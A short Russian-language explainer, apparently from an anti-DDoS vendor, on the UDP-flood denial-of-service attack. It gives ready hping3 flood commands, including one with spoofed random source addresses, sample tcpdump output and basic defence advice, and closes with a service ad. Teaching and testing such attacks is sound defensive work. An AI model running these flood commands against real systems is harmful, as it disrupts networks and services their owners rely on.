UDP-Flood

UDP-Flood

Описание.

Вариаций исполнения UDP-flood’a может быть много, но суть атаки заключается в наводнении жертвы UDP-пакетами.  Цели данной атаки можно обозначить тремя пунктами.

  • Сгенерировать такое количество bps (бит в секунду), чтобы исчерпать канал связи атакуемого.
  • Сгенерировать такое количество  pps (пакетов в секунду), которое оборудование не сможет обработать.
  • Нагрузить оборудование атакуемого, отправляя UDP-пакеты на разные порты, тем самым заставляя сервер обрабатывать  данные пакеты и отвечать ICMP-сообщениями в случае недоступности порта.

UDP-1

UDP-flood является одной из самых простых атак, но это не делает ее неэффективной.

Генерация

Для того чтобы проверить свой ресурс, данную атаку легко сгенерировать путем утилиты hping

hping3 -q -n -a srcIP  --udp  -s 53 --keep -p 68 --flood dstIP

С подменой адресов:

hping3 -q -n --udp  -s 53 --keep -p 68 --flood dstIP --rand-source

В данном трафике будет генерироваться на 68 порт жертвы с порта 53.

Вывод tcpdump на сервере:

22:21:46.611025 IP 1.1.1.1.domain > 1.1.1.2.bootpc: [|domain]
22:21:46.611027 IP 1.1.1.1.domain > 1.1.1.2.bootpc: [|domain]
22:21:46.611028 IP 1.1.1.1.domain > 1.1.1.2.bootpc: [|domain]
22:21:46.611030 IP 1.1.1.1.domain > 1.1.1.2.bootpc: [|domain]
22:21:46.611032 IP 1.1.1.1.domain > 1.1.1.2.bootpc: [|domain]
22:21:46.611034 IP 1.1.1.1.domain > 1.1.1.2.bootpc: [|domain]
22:21:46.611036 IP 1.1.1.1.domain > 1.1.1.2.bootpc: [|domain]
22:21:46.611038 IP 1.1.1.1.domain > 1.1.1.2.bootpc: [|domain]
22:21:46.611039 IP 1.1.1.1.domain > 1.1.1.2.bootpc: [|domain]
22:21:46.611041 IP 1.1.1.1.domain > 1.1.1.2.bootpc: [|domain]
22:21:46.611042 IP 1.1.1.1.domain > 1.1.1.2.bootpc: [|domain]
22:21:46.611044 IP 1.1.1.1.domain > 1.1.1.2.bootpc: [|domain]
22:21:46.611045 IP 1.1.1.1.domain > 1.1.1.2.bootpc: [|domain]

Конечно, сгенерировать большие объемы трафика утилой hping3 достаточно сложно, но чтобы посмотреть, как отрабатывает сервер – достаточно.

Защита

Защита от подобных атак — закрытие неиспользуемых портов, блокирование UDP-трафика на TCP-порты. Однако, все это не поможет, если атака идет на переполнение канала или ваше оборудование неспособно «пережевать» прилетаемый трафик. В этом случае рекомендуется использовать специализированные системы защиты от DDOS или договориться с оператором связи, вашим апстримом, чтобы они совместно с вами настроили на своем оборудовании фильтры на случай атаки.

UDP-2

 

Купить\Заказать услугу AntiDDOS можно здесь.